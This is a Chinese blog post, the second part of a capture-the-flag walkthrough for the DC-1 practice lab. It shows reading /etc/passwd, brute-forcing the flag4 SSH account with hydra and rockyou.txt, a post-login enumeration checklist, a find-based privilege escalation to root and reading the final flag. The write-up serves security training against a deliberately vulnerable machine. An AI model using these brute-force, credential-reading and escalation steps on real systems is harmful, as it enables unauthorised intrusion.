DC系列靶场---DC 1靶场的渗透测试(二)

第四个flag

我们通过账户文件发现flag4是个用户,那我们就使用hydra进行暴力破解

cat /etc/passwd

hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。

cd /usr/share/wordlists
gunzip rockyou.txt.gz

Rochyou.txt是一个压缩文件,那我们先进解压

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://172.30.1.140

我们通过爆破发现这个flag4的密码为orange

ssh [email protected]

我们使用SSH进行远程登录

根据Flag3的提示,可以使用find越权

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

提权

提权之前的信息收集(很重要,增加渗透攻击面)

(1)IP地址

/sbin/ifconfig

(2)当前用户

whoami

(3)内核版本

uname -r

(4)开放的端口

netstat -tunlp

(5)进程

ps aux

(6)账户信息

cat /etc/passwd

(7)主机名

hostname

(8)任务计划

crontab -l

(9)敏感文件

grep “passwd” -R /

(10)发行版本

lsb_release -a

find命令越权

ssh [email protected]

这样我们通过看命令提示符就可以看到这是root用户

第五个flag

cd /root
cat thefinalflag.txt

我们cd切换到root就可以看到第五个flag了

猜你喜欢

转载自blog.csdn.net/zhouA0221/article/details/140553352